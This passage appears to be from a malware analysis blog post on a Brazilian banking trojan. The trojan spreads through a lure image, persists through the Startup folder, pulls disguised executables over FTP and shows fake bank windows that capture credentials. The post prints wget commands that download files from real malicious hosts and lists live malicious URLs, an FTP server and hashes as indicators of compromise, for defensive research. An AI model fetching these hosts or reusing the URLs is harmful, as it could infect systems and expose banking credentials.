<div style="text-align: center;"><div style="text-align: center;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <span style="font-family: "Courier New",Courier,monospace;">wget -v mylove2010.info/catastrofe/feed10.php</span></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> As you can see above, this is a smtp engine used by this threat. Just in case I have submitted this PHP script to virustotal and <a href="http://www.virustotal.com/file-scan/report.html?id=45c74823c2888277c1feaf706cc08a032da3557d56e2d7053d88069306b25c96-1295920917" style="color: orange;">you can see the results</a>. This sounds a true smtp engine script, so there is no malware associated to this program, while it might be used by malwares.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
<b> Analyzing the file ariedina.jpg3</b><br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> This is just a picture which is used to attract people to click and see a 'video' at youtube.com, however, as you can see on the source code there is a HREF instruction so when the user clicks on this picture (anywhere) it will get the user to the malicious website: hxxp://twurl.nl/rbpm6s</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
I have downloaded this picture so I could analyze it and saw that it's really just a picture:<br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: center;"><div style="text-align: center;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <span style="font-family: "Courier New",Courier,monospace;">wget -v http://lh4.ggpht.com/_FJQwbg0nrOk/TTGRJVC1KtI/AAAAAAAAAMs/CUvYCECUkhM/ariedina.jpg3</span></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: center;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TUV-QnoFyJI/AAAAAAAAAa8/N3j1bO7DrgE/s1600/3-MI_third-wget+on+the+ariedinaJPG3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TUV-QnoFyJI/AAAAAAAAAa8/N3j1bO7DrgE/s400/3-MI_third-wget+on+the+ariedinaJPG3.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> I have submitted this file to the virustotal website so you can get the report using the link below. There are <a href="http://www.virustotal.com/file-scan/report.html?id=67d170fce9a3b21411cb07a9a1e3ca6de78fff95f997a747fd3bba5400f353c3-1295920946" style="color: orange;">no detection</a> since this is just a picture.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
<b>Analyzing the link hxxp://twurl.nl/rbpm6s</b><br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Using wget pointing to the URL hxxtp://twurl.nl/rbpm6s resulted in downloading a file named youtube_video756.exe.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> </communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: center;"><div style="text-align: center;"><communications_msn_cs_ptbr@microsoft.windowslive.com style="font-family: "Courier New",Courier,monospace;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> wget -v http://twurl.nl/rbpm6s</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
<b>Analyzing youtube_video756.exe</b><br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> After submitting this sample to <a href="http://www.virustotal.com/file-scan/report.html?id=522ef5780f2973f5e01853287619df0ddf1c4447ba6c0dcd3d6591b4778423d5-1295921002" style="color: orange;">virustotal</a> you can see that some AV vendors detects this threat. Some of them using signatures and a couple of them using a in-cloud technology.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
If you run youtube_video756.exe, it will basically perform the following activities:<br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Create a copy of itself using a file named Recorte de tela e Iniciador do OneNote 2007.exe on the folder "C:\Documents and Settings\%user%\Start Menu\Programs\Startup\". This process is then launched.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com>It connects to the ftp site ftp.biancarox.net using the username cohabrox and a password which will not be reported here just in case. It downloads 10 files (listed below) to the folder C:\documents and setings\%user%\. While all of these files have a .txt extension, they are not a true .txt file. Looking at its strings you can see that they are really executables.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: justify;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TUWDgsLT-gI/AAAAAAAAAbA/IwkwiYHhSqI/s1600/4-MI_trojan+has+downloaded+10+files.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TUWDgsLT-gI/AAAAAAAAAbA/IwkwiYHhSqI/s400/4-MI_trojan+has+downloaded+10+files.JPG" width="400" /></a></div><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com>Taking a look at the process strings (below), we can see several internet bank sites of Brazil and two webmail websites.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: justify;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TUWEUFT64SI/AAAAAAAAAbE/9aFPewNpOOE/s1600/5-MI_strings+on+memory-target+banks+websites.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TUWEUFT64SI/AAAAAAAAAbE/9aFPewNpOOE/s400/5-MI_strings+on+memory-target+banks+websites.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com>When you open Internet Explorer and type one of the target URLs, like www.bradesco.com.br (which is a true bank of Brazil), it will kill iexplorer.exe and will load a new process C:\Document and Settings\%user%\®¢Ÿª¤ª¥ž¥.txt. If you type anoher URL on the IE address bar like www.bradescoprime.com.br, another process will be launched on this case it would be the ®ž“§«š§«š.txt.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> </communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> This process is a fake application which emulates the requested website and it will capture your bank agency, account, token, passwords, etc. See screenshots below:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: justify;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TUWFYX0ULmI/AAAAAAAAAbI/5Dg8SLYBHHE/s1600/6-MI_one+of+the+fake+websites-typing+bank+agency+and+account.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TUWFYX0ULmI/AAAAAAAAAbI/5Dg8SLYBHHE/s400/6-MI_one+of+the+fake+websites-typing+bank+agency+and+account.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> While you are typing your bank agency, account, password, token, etc, the trojan is capturing everything and is written it to a *.bsp file on the C:\Documents and settings\%user%\. Below you have an example:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: justify;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TUWFxPEbkwI/AAAAAAAAAbM/RiqJNBjgchY/s1600/10-MI_TXT+file+generated+by+the+trojan+with+all+of+my+passwords-data.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TUWFxPEbkwI/AAAAAAAAAbM/RiqJNBjgchY/s400/10-MI_TXT+file+generated+by+the+trojan+with+all+of+my+passwords-data.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
<b>Indicators of compromise</b><br />
<br />
Check for the existence of the following MD5 on the C:\Documents and Settings\%user%\. </communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<ul><li><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <i>edaa81ad2165c65bb340e636bf642291</i></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> b82c51f94b0e516f461b6f84a668dfde</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> 76184bebea96f59086368b64a896d224</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> f590d18d7b50109c03c6237d86e8415d</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> 52ea037028eb2274147aef1edfb64865</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> daa21069ae179cc0f195cd42795b592b</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> 86802efad8fb5b8153d7c7de67cb66bb</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> fc7592c9f2e2264c687a806459387d30</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> 9547ff6be241b5bb8a87f0dabe3b3218</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> 5cd6a3ac2b2d97e36091a1ecd2fd0aec</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
</ul><div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Check if the process Recorte de tela e Iniciador do OneNote 2007.exe is running or present on the folder C:\Documents and Settings\*\Start Menu\Programs\Startup\ (it's MD5 is d34c8d3ad55f65d701264a5e8e278915)</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
Network connections to:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<ul><li><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <i>hxxp://mylove2010.info/catastrofe/feed10.php</i></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> hxxp://twurl.nl/rbpm6s</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> hxxp://livinianot.com.br/</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> ftp.biancarox.net</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
</ul><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Below you have a report from VirusTotal regarding the samples that we have analyzed here:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=968db70645fceeb734ba941ee78d51848057762b0559709238c59d4391d1c25e-1295986300" style="color: orange;"><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com>id=968db70645fceeb734ba941ee78d51848057762b0559709238c59d4391d1c25e-1295986300</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></a><br />
<i style="color: orange;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <a href="http://www.virustotal.com/file-scan/report.html?id=961a9c536b98d02172eb48bd2e0e4881591ac1eb607bf1ea7f267f4994c6b6f6-1295986210">id=961a9c536b98d02172eb48bd2e0e4881591ac1eb607bf1ea7f267f4994c6b6f6-1295986210</a></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i><br />
<i style="color: orange;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <a href="http://www.virustotal.com/file-scan/report.html?id=e6a33cbba7e6348c41cb7e10acac4efaf47286603d54d1c7088f8772bb0f23e8-1295986257">id=e6a33cbba7e6348c41cb7e10acac4efaf47286603d54d1c7088f8772bb0f23e8-1295986257</a></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=4e908de9a38bb3b90435b0d8b733ad11836a8f65bff2cd6cd247fd47a332af16-1295996254" style="color: orange;"><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> id=4e908de9a38bb3b90435b0d8b733ad11836a8f65bff2cd6cd247fd47a332af16-1295996254</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=d12ef9562f2deae6ef8e7d5842bf1f1425fc23ce7b6c2265a62189eac14e966f-1295985855"><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <span style="color: orange;">id=d12ef9562f2deae6ef8e7d5842bf1f1425fc23ce7b6c2265a62189eac14e966f-1295985855</span></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=8d1a2ece03010fe9610c852a70d13c22f9e91d93e39abc939a742d84b279ea64-1295996475"> <span style="color: orange;">id=8d1a2ece03010fe9610c852a70d13c22f9e91d93e39abc939a742d84b279ea64-1295996475</span></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=457278ad3bc382dd5159c0be8e9f2f2e3e1cf9191861b56497c81f21f423808d-1295996615" style="color: orange;"><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com>id=457278ad3bc382dd5159c0be8e9f2f2e3e1cf9191861b56497c81f21f423808d-1295996615</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></a><br />
